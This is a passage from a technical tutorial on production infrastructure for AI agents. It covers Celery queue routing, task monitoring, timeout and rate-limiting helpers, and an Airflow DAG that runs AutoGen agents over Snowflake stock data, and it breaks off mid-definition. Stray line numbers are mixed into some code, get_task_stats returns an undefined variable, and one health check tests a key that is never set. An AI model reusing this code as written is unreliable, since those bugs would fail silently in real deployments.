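To make the orchestration and scalability points concrete: Celery can route task types to separate queues so that slow document analysis does not delay conversation replies, and `periodic_agent_check` only runs if a beat schedule entry triggers it. The fragment below sketches Django settings for both. It assumes the Celery app loads settings with the `CELERY_` namespace and that the tasks live in `agent_app/tasks.py`; the queue names and the 15-minute interval are illustrative choices, not values taken from the project.

```python
# settings.py (fragment)

# Route heavier task types to their own queues (queue names are hypothetical)
CELERY_TASK_ROUTES = {
    "agent_app.tasks.analyze_document": {"queue": "documents"},
    "agent_app.tasks.update_knowledge_base": {"queue": "indexing"},
    "agent_app.tasks.process_conversation": {"queue": "conversations"},
}

# Run the stalled-task sweep every 15 minutes via celery beat
CELERY_BEAT_SCHEDULE = {
    "check-stalled-agent-tasks": {
        "task": "agent_app.tasks.periodic_agent_check",
        "schedule": 15 * 60,  # interval in seconds
    },
}
```

Workers can then be dedicated to a queue with the `-Q` option of `celery worker`, which lets each queue scale independently.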

Production Considerations:

  1. Task Queue Monitoring:

For production systems, you would want to add proper monitoring for Celery tasks:

python
# monitoring/celery_monitoring.py
import logging
import time

import requests
from celery import Celery

logger = logging.getLogger('agent_app.monitoring')

class CeleryMonitor:
    """Monitor for Celery tasks and workers."""

    def __init__(self, broker_url):
        self.broker_url = broker_url
        # Minimal app handle, used only to broadcast inspect commands
        self.app = Celery(broker=broker_url)

    def get_worker_stats(self):
        """Get statistics about active Celery workers."""
        try:
            # inspect() calls return None when no worker replies in time
            inspector = self.app.control.inspect(timeout=2.0)
            stats = inspector.stats() or {}
            active = inspector.active() or {}
            # Workers do not report failure counts via inspect; track those
            # through Flower or task events if they are needed
            return {
                "active_workers": len(stats),
                "processed_tasks": sum(
                    sum(worker.get("total", {}).values())
                    for worker in stats.values()
                ),
                "running_tasks": {
                    name: len(tasks) for name, tasks in active.items()
                }
            }
        except Exception as e:
            logger.error(f"Error getting worker stats: {str(e)}")
            return {
                "error": str(e),
                "timestamp": time.time()
            }
36
37 def get_task_stats(self):
38 """Get statistics about task processing."""
39 try:
            # This would typically connect to the Flower API or Redis directly.
            # Example using the Flower API, assuming it runs on localhost:5555
            response = requests.get("http://localhost:5555/api/tasks", timeout=5)
            response.raise_for_status()
            tasks = response.json()
48 # Count tasks by status
49 status_counts = {}
50 for task_id, task in tasks.items():
51 status = task.get("state", "UNKNOWN")
52 status_counts[status] = status_counts.get(status, 0) + 1
53
54 # Count tasks by type
55 type_counts = {}
56 for task_id, task in tasks.items():
57 task_name = task.get("name", "UNKNOWN")
58 type_counts[task_name] = type_counts.get(task_name, 0) + 1
59
60 return {
61 "task_count": task_count,
62 "status_counts": status_counts,
63 "type_counts": type_counts
64 }
65 except Exception as e:
66 logger.error(f"Error getting task stats: {str(e)}")
67 return {
68 "error": str(e),
69 "timestamp": time.time()
70 }
71
72 def check_health(self):
73 """Check if Celery is healthy."""
74 try:
75 worker_stats = self.get_worker_stats()
76
77 # Consider unhealthy if no active workers
78 if worker_stats.get("active_workers", 0) == 0:
79 return {
80 "status": "unhealthy",
81 "reason": "No active workers",
82 "timestamp": time.time()
83 }
84
85 # Consider unhealthy if excessive failed tasks
86 if worker_stats.get("failed_tasks", 0) > 1000:
87 return {
88 "status": "degraded",
89 "reason": "High failure rate",
90 "timestamp": time.time()
91 }
92
93 return {
94 "status": "healthy",
95 "active_workers": worker_stats.get("active_workers", 0),
96 "timestamp": time.time()
97 }
98 except Exception as e:
99 logger.error(f"Error checking Celery health: {str(e)}")
100 return {
101 "status": "unknown",
102 "error": str(e),
103 "timestamp": time.time()
104 }
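
`check_health` above reports a degraded state once the absolute failure count passes 1000, a threshold that any long-lived deployment will eventually cross. A failure ratio is usually a steadier signal. The sketch below shows one way to classify health from counters. `classify_health`, its thresholds, and the `min_samples` guard are hypothetical choices, and the success and failure counts are assumed to come from wherever they are tracked (for example Flower or task events).

```python
import time


def classify_health(active_workers, succeeded, failed,
                    max_failure_ratio=0.05, min_samples=50):
    """Classify Celery health from worker and task counters."""
    now = time.time()

    # No workers means nothing can be processed at all
    if active_workers <= 0:
        return {"status": "unhealthy", "reason": "No active workers", "timestamp": now}

    total = succeeded + failed
    ratio = failed / total if total else 0.0

    # Ignore the ratio until enough tasks have finished to make it meaningful
    if total >= min_samples and ratio > max_failure_ratio:
        return {
            "status": "degraded",
            "reason": f"Failure ratio {ratio:.1%} exceeds {max_failure_ratio:.1%}",
            "timestamp": now,
        }

    return {
        "status": "healthy",
        "active_workers": active_workers,
        "failure_ratio": ratio,
        "timestamp": now,
    }
```

Computing the ratio over a recent window rather than all-time totals would make the check respond faster to new incidents.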

  2. Handling Long-Running Tasks:

For production, you should implement proper handling of long-running tasks:

python
1# long_running_task_handler.py
2import time
3import signal
4import threading
5from functools import wraps
6from celery.exceptions import SoftTimeLimitExceeded
7
8def timeout_handler(func=None, timeout=1800, callback=None):
9 """
10 Decorator to handle timeouts for long-running functions.
11
12 Args:
13 func: The function to decorate
14 timeout: Timeout in seconds
15 callback: Function to call on timeout
16
17 Returns:
18 Decorated function
19 """
20 def decorator(f):
21 @wraps(f)
22 def wrapped(*args, **kwargs):
23 # Store the result
24 result = [None]
25 exception = [None]
26
27 # Define thread target
28 def target():
29 try:
30 result[0] = f(*args, **kwargs)
31 except Exception as e:
32 exception[0] = e
33
34 # Create and start thread
35 thread = threading.Thread(target=target)
36 thread.daemon = True
37 thread.start()
38
39 # Wait for thread to complete or timeout
40 thread.join(timeout)
41
42 # Handle timeout
43 if thread.is_alive():
44 if callback:
45 callback()
46
47 # Raise timeout exception
48 raise TimeoutError(f"Function {f.__name__} timed out after {timeout} seconds")
49
50 # Handle exception
51 if exception[0]:
52 raise exception[0]
53
54 return result[0]
55
56 return wrapped
57
58 if func:
59 return decorator(func)
60
61 return decorator
62
# Example usage in a task (assumes shared_task, logger and AgentTask are
# available as in agent_app/tasks.py)
@shared_task(bind=True)
def complex_analysis_task(self, task_id):
    # Look up the task first so the handlers below always have a bound `task`
    try:
        task = AgentTask.objects.get(id=task_id)
    except AgentTask.DoesNotExist:
        logger.error(f"Task {task_id} not found")
        return {"error": f"Task {task_id} not found"}

    try:
        task.set_processing(self.request.id)

        # Define timeout callback
        def on_timeout():
            logger.error(f"Task {task_id} timed out")
            task.set_failed("Task exceeded time limit")

        # Use timeout handler for complex processing
        @timeout_handler(timeout=1800, callback=on_timeout)
        def run_complex_analysis(data):
            # Complex analysis code here
            # ...
            return result

        # Run with timeout handler
        result = run_complex_analysis(task.input_data)

        # Update task
        task.set_completed(result)
        return result

    except SoftTimeLimitExceeded:
        logger.error(f"Task {task_id} exceeded soft time limit")
        task.set_failed("Task exceeded time limit")
        return {"error": "Task exceeded time limit"}

    except TimeoutError as e:
        logger.error(f"Task {task_id} timed out: {str(e)}")
        task.set_failed(f"Task timed out: {str(e)}")
        return {"error": str(e)}

    except Exception as e:
        logger.error(f"Error in task {task_id}: {str(e)}")
        task.set_failed(str(e))
        return {"error": str(e)}
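
Because Python cannot forcibly stop a thread, work wrapped by `timeout_handler` keeps running in the background after the timeout fires. When the work can be split into discrete steps, a cooperative deadline is a simple alternative: the function checks the clock between steps and stops itself. The sketch below illustrates the idea under that assumption; `Deadline` and `run_steps` are hypothetical names, not part of the original code.

```python
import time


class Deadline:
    """Tracks a time budget that long-running code checks between steps."""

    def __init__(self, seconds, clock=time.monotonic):
        self._clock = clock
        self._expires_at = clock() + seconds

    def remaining(self):
        """Return the seconds left in the budget, never below zero."""
        return max(0.0, self._expires_at - self._clock())

    def check(self):
        """Raise TimeoutError once the budget is used up."""
        if self._clock() >= self._expires_at:
            raise TimeoutError("Deadline exceeded")


def run_steps(steps, deadline):
    """Run callables in order, refusing to start a step after the deadline."""
    results = []
    for step in steps:
        deadline.check()  # stops before starting more work, not mid-step
        results.append(step())
    return results
```

A task could create `Deadline(1800)` at the start and pass it into its processing loop, so a timeout leaves no orphaned work behind. A single step that blocks for a long time still needs its own limit, such as a request timeout on the underlying LLM call.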

  3. Rate Limiting and Backoff:

For production, implement rate limiting and exponential backoff:

python
# rate_limiting.py
import time
import redis
import functools
import random
import logging

logger = logging.getLogger('agent_app.rate_limiting')


class RateLimitExceeded(Exception):
    """Exception raised when rate limit is exceeded."""
    pass


class RateLimiter:
    """Rate limiter using Redis."""

    def __init__(self, redis_url, limit_key, limit_rate, limit_period=60):
        """
        Initialize rate limiter.

        Args:
            redis_url: Redis URL
            limit_key: Key prefix for rate limiting
            limit_rate: Maximum number of calls
            limit_period: Period in seconds
        """
        self.redis = redis.from_url(redis_url)
        self.limit_key = limit_key
        self.limit_rate = limit_rate
        self.limit_period = limit_period

    def _key(self, subkey=None):
        """Build the Redis key, optionally scoped by subkey."""
        return f"{self.limit_key}:{subkey}" if subkey else self.limit_key

    def is_rate_limited(self, subkey=None):
        """
        Check if the current call is rate limited.

        Args:
            subkey: Optional subkey for more granular limiting

        Returns:
            bool: True if rate limited, False otherwise
        """
        key = self._key(subkey)

        # INCR is atomic and creates the key at 1 if it is missing, so two
        # concurrent callers cannot both see an empty counter and reset it.
        count = self.redis.incr(key)

        # First call in this window: start the expiry clock
        if count == 1:
            self.redis.expire(key, self.limit_period)

        # Check if rate limited
        if count > self.limit_rate:
            # Get TTL to know how long until reset
            ttl = self.redis.ttl(key)
            logger.warning(f"Rate limited for {key}. TTL: {ttl}")
            return True

        return False

    def get_remaining(self, subkey=None):
        """Get remaining calls allowed."""
        current = self.redis.get(self._key(subkey))

        if current is None:
            return self.limit_rate

        return max(0, self.limit_rate - int(current))

    def get_reset_time(self, subkey=None):
        """Get time until rate limit resets."""
        ttl = self.redis.ttl(self._key(subkey))

        # Redis returns a negative TTL when the key is missing or has no expiry
        if ttl < 0:
            return 0

        return ttl


def with_rate_limiting(limiter, subkey_func=None, max_retries=3, backoff_base=2):
    """
    Decorator for rate limiting functions.

    Args:
        limiter: RateLimiter instance
        subkey_func: Function to extract subkey from args/kwargs
        max_retries: Maximum number of retries
        backoff_base: Base for exponential backoff

    Returns:
        Decorated function
    """
    def decorator(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            # Get subkey if provided
            subkey = None
            if subkey_func:
                subkey = subkey_func(*args, **kwargs)

            retries = 0
            while retries <= max_retries:
                # Not rate limited: execute the function
                if not limiter.is_rate_limited(subkey):
                    return func(*args, **kwargs)

                # If max retries reached, raise exception
                if retries >= max_retries:
                    reset_time = limiter.get_reset_time(subkey)
                    raise RateLimitExceeded(
                        f"Rate limit exceeded. Try again in {reset_time} seconds."
                    )

                # Calculate backoff with jitter
                backoff = (backoff_base ** retries) + random.uniform(0, 0.5)

                # Log and sleep
                logger.info(f"Rate limited. Retrying in {backoff:.2f} seconds. Retry {retries+1}/{max_retries}")
                time.sleep(backoff)

                retries += 1

        return wrapped

    return decorator


# Example usage
# Initialize limiter for OpenAI API
openai_limiter = RateLimiter(
    redis_url="redis://localhost:6379/0",
    limit_key="openai_api",
    limit_rate=100,  # 100 requests per minute
    limit_period=60
)

# Use in function
@with_rate_limiting(
    limiter=openai_limiter,
    subkey_func=lambda user_id, *args, **kwargs: f"user:{user_id}",
    max_retries=3
)
def call_openai_api(user_id, prompt):
    # API call here
    pass
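
To get a feel for how long a caller may wait before `RateLimitExceeded` is raised, the retry schedule can be computed on its own. The following is a minimal sketch of the same `backoff_base ** retries` plus jitter formula as a pure function. The name `backoff_delays` and the `max_delay` cap are illustrative assumptions and are not part of the module above.

```python
import random


def backoff_delays(max_retries=3, backoff_base=2, jitter=0.5, max_delay=60.0, rng=None):
    """Return the sleep durations an exponential-backoff loop would use.

    Hypothetical helper: mirrors the delay formula used by the decorator,
    with an added upper bound (max_delay) so delays cannot grow unbounded.
    """
    rng = rng or random.Random()
    delays = []
    for attempt in range(max_retries):
        # Exponential growth plus a small random jitter to spread out retries
        delay = (backoff_base ** attempt) + rng.uniform(0, jitter)
        delays.append(min(delay, max_delay))
    return delays


if __name__ == "__main__":
    # Seeded generator so repeated runs print the same schedule
    for attempt, delay in enumerate(backoff_delays(rng=random.Random(0)), start=1):
        print(f"retry {attempt}: sleep {delay:.2f}s")
```

With the defaults, the delays start at roughly 1, 2, and 4 seconds, so a caller blocks for about 7 seconds in the worst case before the exception surfaces. Capping the delay matters once `max_retries` grows, because the uncapped schedule doubles on every attempt.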

This stack is particularly well-suited for organizations that need to:

  • Build complex task orchestration systems with AI agents
  • Maintain a centralized knowledge base for semantic search
  • Implement conversational applications with persistent state
  • Create document processing workflows with AI analysis
  • Support background processing with robust task management

Airflow + AutoGen + OpenAI Functions + Snowflake (Enterprise AI Automation)

This stack is optimized for enterprise-grade AI workflows that require robust scheduling, governance, and integration with enterprise data platforms. It's particularly well-suited for data-intensive applications that need to operate on a schedule and integrate with existing data infrastructure.

Architecture Overview:

Airflow + AutoGen + Snowflake Architecture

The architecture consists of:

  1. Apache Airflow: Workflow orchestration engine for scheduling and monitoring
  2. AutoGen: Multi-agent orchestration framework
  3. OpenAI Functions: Structured function calling for agents
  4. Snowflake: Enterprise data platform for storage and analytics
  5. MLflow: Experiment tracking and model registry

Implementation Example:

Let's implement an Airflow DAG that orchestrates AI agents to analyze financial data in Snowflake:

python
# dags/financial_analysis_agent_dag.py
import os
import json
import datetime
import tempfile
import pendulum
import autogen
import pandas as pd
from snowflake.connector.pandas_tools import write_pandas
import openai
import mlflow

from airflow import DAG
from airflow.models import Variable
from airflow.operators.python import PythonOperator
from airflow.providers.snowflake.hooks.snowflake import SnowflakeHook
from airflow.models.param import Param

# Connect to OpenAI with API key from Airflow Variable
openai_api_key = Variable.get("OPENAI_API_KEY", default_var="")
os.environ["OPENAI_API_KEY"] = openai_api_key
openai.api_key = openai_api_key

# Default arguments for DAG
default_args = {
    'owner': 'data_science',
    'depends_on_past': False,
    'email': ['data_science@example.com'],
    'email_on_failure': True,
    'email_on_retry': False,
    'retries': 1,
    'retry_delay': datetime.timedelta(minutes=5),
}

# Define DAG
dag = DAG(
    'financial_analysis_agent',
    default_args=default_args,
    description='AI agent pipeline for financial data analysis',
    schedule_interval='0 4 * * 1-5',  # 4 AM on weekdays
    # Replaces the deprecated airflow.utils.dates.days_ago(1)
    start_date=pendulum.today('UTC').add(days=-1),
    catchup=False,
    max_active_runs=1,
    max_active_tasks=3,  # replaces the deprecated `concurrency` argument (Airflow 2.2+)
    tags=['ai_agents', 'finance', 'analysis'],
    params={
        # Note: this default is evaluated each time the DAG file is parsed
        'analysis_date': Param(
            default=pendulum.now().subtract(days=1).to_date_string(),
            type='string',
            format='date'
        ),
        'stock_symbols': Param(
            default='["AAPL", "MSFT", "GOOGL", "AMZN", "META"]',
            type='string'
        ),
        'report_type': Param(
            default='standard',
            type='string',
            enum=['standard', 'detailed', 'executive']
        ),
        'include_sentiment': Param(
            default=True,
            type='boolean'
        )
    }
)

# Helper functions
def get_snowflake_connection():
    """Get Snowflake connection from Airflow hook."""
    hook = SnowflakeHook(snowflake_conn_id='snowflake_default')
    return hook.get_conn()

def run_query(query, params):
    """Run a parameterized query and return the rows as a DataFrame."""
    conn = get_snowflake_connection()
    try:
        cursor = conn.cursor()
        try:
            cursor.execute(query, params)
            rows = cursor.fetchall()
            # Snowflake reports unquoted identifiers in upper case; lower-case
            # them so downstream code can use df['symbol'], df['open'], etc.
            columns = [desc[0].lower() for desc in cursor.description]
        finally:
            cursor.close()
    finally:
        conn.close()

    return pd.DataFrame(rows, columns=columns)

def fetch_stock_data(date_str, symbols):
    """Fetch stock data from Snowflake for specified date and symbols."""
    # Bind values instead of formatting them into the SQL string
    placeholders = ", ".join(["%s"] * len(symbols))
    query = f"""
        SELECT
            symbol,
            date,
            open,
            high,
            low,
            close,
            volume,
            adj_close
        FROM
            finance.stocks.daily_prices
        WHERE
            date = %s
            AND symbol IN ({placeholders})
        ORDER BY
            symbol, date
    """

    return run_query(query, [date_str, *symbols])

def fetch_financial_news(date_str, symbols):
    """Fetch financial news from Snowflake for specified date and symbols."""
    placeholders = ", ".join(["%s"] * len(symbols))
    # Snowflake has no `&&` array operator; ARRAYS_OVERLAP tests for shared elements
    query = f"""
        SELECT
            headline,
            source,
            url,
            published_at,
            sentiment,
            symbols
        FROM
            finance.news.articles
        WHERE
            DATE(published_at) = %s
            AND ARRAYS_OVERLAP(symbols_array, ARRAY_CONSTRUCT({placeholders}))
        ORDER BY
            published_at DESC
        LIMIT
            50
    """

    return run_query(query, [date_str, *symbols])

def store_analysis_results(analysis_results, date_str):
    """Store analysis results in Snowflake."""
    # Create DataFrame from analysis results
    if isinstance(analysis_results, str):
        # If results are a string (like JSON), parse it
        try:
            results_dict = json.loads(analysis_results)
        except json.JSONDecodeError:
            # If not valid JSON, create a simple dict
            results_dict = {"analysis_text": analysis_results}
    else:
        # Already a dict-like object
        results_dict = analysis_results

    # Flatten nested dictionaries (one level deep; deeper values are stored as JSON)
    flat_results = {}
    for key, value in results_dict.items():
        if isinstance(value, dict):
            for sub_key, sub_value in value.items():
                if isinstance(sub_value, (dict, list)):
                    flat_results[f"{key}_{sub_key}"] = json.dumps(sub_value)
                else:
                    flat_results[f"{key}_{sub_key}"] = sub_value
        elif isinstance(value, list):
            flat_results[key] = json.dumps(value)
        else:
            flat_results[key] = value

    # Add analysis date
    flat_results['analysis_date'] = date_str
    flat_results['created_at'] = datetime.datetime.now().isoformat()

    # Create DataFrame
    df = pd.DataFrame([flat_results])

    # Upload to Snowflake (the target table must already exist with matching columns)
    conn = get_snowflake_connection()
    try:
        success, num_chunks, num_rows, output = write_pandas(
            conn=conn,
            df=df,
            table_name='AGENT_ANALYSIS_RESULTS',
            schema='REPORTS',
            database='FINANCE'
        )
    finally:
        conn.close()

    return {
        'success': success,
        'num_rows': num_rows,
        'table': 'FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS'
    }

# Task functions
def extract_data(**context):
    """Extract relevant financial data for analysis."""
    # Get parameters
    params = context['params']
    analysis_date = params.get('analysis_date')
    stock_symbols = json.loads(params.get('stock_symbols'))

    # Fetch stock price data
    stock_data = fetch_stock_data(analysis_date, stock_symbols)
    if stock_data.empty:
        raise ValueError(f"No stock data found for {analysis_date} and symbols {stock_symbols}")

    # Fetch financial news
    news_data = fetch_financial_news(analysis_date, stock_symbols) if params.get('include_sentiment') else pd.DataFrame()

    # Calculate basic metrics
    metrics = {}
    for symbol in stock_symbols:
        symbol_data = stock_data[stock_data['symbol'] == symbol]
        if not symbol_data.empty:
            row = symbol_data.iloc[0]
            open_price = float(row['open'])
            close_price = float(row['close'])
            metrics[symbol] = {
                'open': open_price,
                'close': close_price,
                'high': float(row['high']),
                'low': float(row['low']),
                'volume': int(row['volume']),
                'daily_change': close_price - open_price,
                'daily_change_pct': (close_price - open_price) / open_price * 100
            }

    # Prepare data for AI analysis. Round-tripping through to_json turns dates
    # and other non-JSON values into plain types that XCom can serialize.
    analysis_data = {
        'date': analysis_date,
        'symbols': stock_symbols,
        'stock_data': json.loads(stock_data.to_json(orient='records', date_format='iso', default_handler=str)),
        'metrics': metrics,
        'news_data': json.loads(news_data.to_json(orient='records', date_format='iso', default_handler=str))
    }

    # Save to XCom for next task
    context['ti'].xcom_push(key='analysis_data', value=analysis_data)

    return analysis_data

def run_analysis_agents(**context):
    """Run AI agents for financial analysis."""
    # Get parameters and data
    params = context['params']
    analysis_data = context['ti'].xcom_pull(task_ids='extract_data', key='analysis_data')
    report_type = params.get('report_type')

    # Configure OpenAI
    client = openai.OpenAI(api_key=openai_api_key)
    config_list = [{"model": "gpt-4-turbo", "api_key": openai_api_key}]

    # Define AutoGen agents for financial analysis

    # 1. Financial Analyst Agent - Core analysis
    analyst_agent = autogen.AssistantAgent(
        name="FinancialAnalyst",
        llm_config={
            "config_list": config_list,
            "temperature": 0.2,
            "functions": [
                {
                    "name": "analyze_stock_performance",
                    "description": "Analyze the performance of stocks based on price data",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "symbol": {"type": "string", "description": "Stock symbol to analyze"},
                            "metrics": {
                                "type": "object",
                                "description": "Performance metrics to calculate"
                            },
                            "context": {"type": "string", "description": "Additional context for analysis"}
                        },
                        "required": ["symbol", "metrics"]
                    }
                },
                {
                    "name": "analyze_news_sentiment",
                    "description": "Analyze sentiment from news articles",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "symbol": {"type": "string", "description": "Stock symbol to analyze news for"},
                            # Array parameters need an `items` schema to be valid
                            "news_items": {"type": "array", "items": {"type": "object"}, "description": "List of news articles"},
                            "summary_length": {"type": "integer", "description": "Length of summary to generate"}
                        },
                        "required": ["symbol", "news_items"]
                    }
                }
            ]
        },
        system_message="""You are an expert financial analyst specialized in stock market analysis.
        Your task is to analyze stock performance and provide insights based on price data and news.
        Be analytical, precise, and focus on data-driven insights.
        Consider market trends, volatility, and comparative performance when analyzing stocks.
        Your analysis should be suitable for institutional investors and financial professionals."""
    )

    # 2. Data Scientist Agent - Advanced metrics and models
    data_scientist_agent = autogen.AssistantAgent(
        name="DataScientist",
        llm_config={
            "config_list": config_list,
            "temperature": 0.1,
            "functions": [
                {
                    "name": "calculate_technical_indicators",
                    "description": "Calculate technical indicators for stock analysis",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "symbol": {"type": "string", "description": "Stock symbol"},
                            "price_data": {"type": "object", "description": "Price data for the stock"},
                            "indicators": {"type": "array", "items": {"type": "string"}, "description": "Indicators to calculate"}
                        },
                        "required": ["symbol", "price_data"]
                    }
                },
                {
                    "name": "compare_performance",
                    "description": "Compare performance between multiple stocks",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "symbols": {"type": "array", "items": {"type": "string"}, "description": "Stock symbols to compare"},
                            "metrics": {"type": "object", "description": "Metrics for each stock"}
                        },
                        "required": ["symbols", "metrics"]
                    }
                }
            ]
        },
        system_message="""You are an expert data scientist specializing in financial markets.
        Your role is to perform advanced statistical analysis and calculate technical indicators.
        Focus on quantitative metrics, correlations, and statistical significance.
        Identify patterns and anomalies in the data that might not be immediately obvious.
        Your analysis should be rigorous and mathematically sound."""
    )

    # 3. Report Writer Agent - Generate final report
    report_writer_agent = autogen.AssistantAgent(
        name="ReportWriter",
        llm_config={
            "config_list": config_list,
            "temperature": 0.7,
            "functions": [
                {
                    "name": "generate_financial_report",
                    "description": "Generate a comprehensive financial report",
                    "parameters": {
                        "type": "object",
                        "properties": {
                            "title": {"type": "string", "description": "Report title"},
                            "date": {"type": "string", "description": "Analysis date"},
                            "summary": {"type": "string", "description": "Executive summary"},
                            "stock_analyses": {"type": "object", "description": "Analysis for each stock"},
                            "market_overview": {"type": "string", "description": "Overall market context"},
                            "recommendations": {"type": "array", "items": {"type": "string"}, "description": "Investment recommendations"},
                            "report_type": {"type": "string", "enum": ["standard", "detailed", "executive"], "description": "Type of report to generate"}
                        },
                        "required": ["title", "date", "stock_analyses", "report_type"]
                    }
                }
            ]
        },
        system_message="""You are an expert financial report writer.
        Your task is to synthesize financial analysis into clear, professional reports.
        Organize information logically with appropriate sections and headers.
        Use precise financial terminology while keeping the content accessible.
        Highlight key insights and structure the report according to the specified type:
        - standard: Balanced detail and length for general professional use
        - detailed: Comprehensive analysis with extensive data and charts
        - executive: Concise summary focused on key takeaways and recommendations"""
    )

    # User proxy agent to coordinate the workflow
    user_proxy = autogen.UserProxyAgent(
        name="FinancialDataManager",
        human_input_mode="NEVER",
        code_execution_config={"work_dir": "financial_analysis_workspace"}
    )

    # Create a group chat for the agents
    groupchat = autogen.GroupChat(
        agents=[user_proxy, analyst_agent, data_scientist_agent, report_writer_agent],
        messages=[],
        max_round=15
    )
    # The manager needs its own LLM config to pick the next speaker automatically
    manager = autogen.GroupChatManager(
        groupchat=groupchat,
        llm_config={"config_list": config_list}
    )

    # Start the analysis process (only the first five records are sent as samples)
    stock_data_str = json.dumps(analysis_data['stock_data'][:5])
    news_data_str = json.dumps(analysis_data['news_data'][:5])

    prompt = f"""
    Task: Perform financial analysis for the following stocks: {analysis_data['symbols']} on {analysis_data['date']}.

    Report Type: {report_type}

    Stock Metrics:
    {json.dumps(analysis_data['metrics'], indent=2)}

    Sample Stock Data:
    {stock_data_str}

    Sample News Data:
    {news_data_str}

    Create a comprehensive financial analysis report with the following components:
    1. Market overview for the date
    2. Individual stock analysis for each symbol
    3. Comparative performance analysis
    4. Key insights and patterns
    5. Recommendations based on the data

    The FinancialAnalyst should begin by analyzing each stock's performance.
    The DataScientist should then calculate technical indicators and compare performance.
    Finally, the ReportWriter should compile all analyses into a coherent report.

    The final deliverable should be a complete financial analysis report in the requested format.
    """

    # Start the group chat
    user_proxy.initiate_chat(manager, message=prompt)

    # Extract the final report from the group chat transcript. The transcript
    # lives on the GroupChat object; content can be None for function calls.
    final_report = None
    for message in reversed(groupchat.messages):
        content = message.get('content') or ''
        if message.get('name') == 'ReportWriter' and content.strip():
            final_report = content
            break

    if not final_report:
        # Extract best available result if no clear final report
        for message in reversed(groupchat.messages):
            content = message.get('content') or ''
            if len(content) > 500:
                final_report = content
                break

    # Process and structure the report
    try:
        # Try to extract structured data using OpenAI
        structure_response = client.chat.completions.create(
            model="gpt-4-turbo",
            messages=[
                {"role": "system", "content": "You are a financial data extraction specialist. Extract structured data from financial analysis reports."},
                {"role": "user", "content": f"Extract the key structured data from this financial report in JSON format. Include market_overview, stock_analyses (with individual metrics for each stock), key_insights, and recommendations:\n\n{final_report}"}
            ],
            response_format={"type": "json_object"}
        )

        structured_report = json.loads(structure_response.choices[0].message.content)
    except Exception as e:
        # Fall back to simple structure if extraction fails
        print(f"Structured extraction failed, using fallback: {e}")
        structured_report = {
            "report_text": final_report,
            "report_type": report_type,
            "analysis_date": analysis_data['date'],
            "symbols": analysis_data['symbols']
        }

    # Combine structured report with raw text
    final_result = {
        "structured_data": structured_report,
        "full_report": final_report,
        "report_type": report_type,
        "analysis_date": analysis_data['date'],
        "symbols_analyzed": analysis_data['symbols'],
        "generation_metadata": {
            "timestamp": datetime.datetime.now().isoformat(),
            "model": "gpt-4-turbo",
            "agent_framework": "AutoGen"
        }
    }

    # Log with MLflow if enabled
    try:
        # The context manager ends the run even if logging raises midway
        with mlflow.start_run(run_name=f"financial_analysis_{analysis_data['date']}"):
            # Log parameters
            mlflow.log_params({
                "analysis_date": analysis_data['date'],
                "symbols": ",".join(analysis_data['symbols']),
                "report_type": report_type,
                "include_sentiment": params.get('include_sentiment')
            })

            # Log metrics if available
            stock_analyses = structured_report.get('stock_analyses')
            if isinstance(stock_analyses, dict):
                for symbol, analysis in stock_analyses.items():
                    if isinstance(analysis, dict):
                        for metric, value in analysis.items():
                            if isinstance(value, (int, float)):
                                mlflow.log_metric(f"{symbol}_{metric}", value)

            # Log report as artifact
            with tempfile.NamedTemporaryFile(mode='w', suffix='.txt', delete=False) as f:
                f.write(final_report or "")
                report_path = f.name

            mlflow.log_artifact(report_path)
            os.unlink(report_path)

            # Log raw data sample
            with tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False) as f:
                json.dump(analysis_data, f)
                data_path = f.name

            mlflow.log_artifact(data_path)
            os.unlink(data_path)
    except Exception as e:
        print(f"Error logging to MLflow: {e}")

    # Save to XCom for next task
    context['ti'].xcom_push(key='analysis_results', value=final_result)

    return final_result

def store_results(**context):
    """Store analysis results in Snowflake."""
    # Get analysis results
    analysis_results = context['ti'].xcom_pull(task_ids='run_analysis_agents', key='analysis_results')
    params = context['params']
    analysis_date = params.get('analysis_date')

    # Store in Snowflake
    storage_result = store_analysis_results(analysis_results, analysis_date)

    # Generate report file in S3 via Snowflake (optional).
    # The query assumes the results table exposes full_report and
    # generation_metadata columns; adjust it to the schema you actually load.
    report_file_query = """
        COPY INTO @FINANCE.REPORTS.REPORT_STAGE/financial_reports/
        FROM (
            SELECT
                OBJECT_CONSTRUCT('report', full_report, 'metadata', generation_metadata, 'date', analysis_date) AS report_json
            FROM
                FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS
            WHERE
                analysis_date = %s
            ORDER BY
                created_at DESC
            LIMIT 1
        )
        FILE_FORMAT = (TYPE = JSON)
        OVERWRITE = TRUE
        SINGLE = TRUE
        HEADER = TRUE;
    """

    conn = get_snowflake_connection()
    try:
        cursor = conn.cursor()
        try:
            # Bind the date instead of formatting it into the SQL string
            cursor.execute(report_file_query, (analysis_date,))
            file_result = cursor.fetchall()
        finally:
            cursor.close()
    finally:
        conn.close()

    # Return combined results
    result = {
        'snowflake_storage': storage_result,
        'report_file': file_result
    }

    return result

def notify_stakeholders(**context):
    """Send notification about completed analysis."""
    # Get parameters and results
    params = context['params']
    analysis_date = params.get('analysis_date')
    stock_symbols = json.loads(params.get('stock_symbols'))
    analysis_results = context['ti'].xcom_pull(task_ids='run_analysis_agents', key='analysis_results')

    # Extract key insights if available
    key_insights = []
    if ('structured_data' in analysis_results and
            'key_insights' in analysis_results['structured_data']):
        if isinstance(analysis_results['structured_data']['key_insights'], list):
            key_insights = analysis_results['structured_data']['key_insights']
        elif isinstance(analysis_results['structured_data']['key_insights'], str):
            key_insights = [analysis_results['structured_data']['key_insights']]

    # Build notification content
    notification = {
        'title': f"Financial Analysis Report - {analysis_date}",
        'date': analysis_date,
        'symbols': stock_symbols,
        'key_insights': key_insights[:3],  # Just top 3 insights
        'report_url': f"https://analytics.example.com/reports/finance/{analysis_date.replace('-', '')}.html",
        'snowflake_table': "FINANCE.REPORTS.AGENT_ANALYSIS_RESULTS"
    }

    # Log notification (in production, would actually send via email/Slack)
    print(f"Would send notification: {json.dumps(notification, indent=2)}")

    # Return notification content
    return notification

# Define DAG tasks
# (provide_context is not needed in Airflow 2: the context is passed to
# callables that accept **context automatically)
extract_task = PythonOperator(
    task_id='extract_data',
    python_callable=extract_data,
    dag=dag,
)

analysis_task = PythonOperator(
    task_id='run_analysis_agents',
    python_callable=run_analysis_agents,
    dag=dag,
)

store_task = PythonOperator(
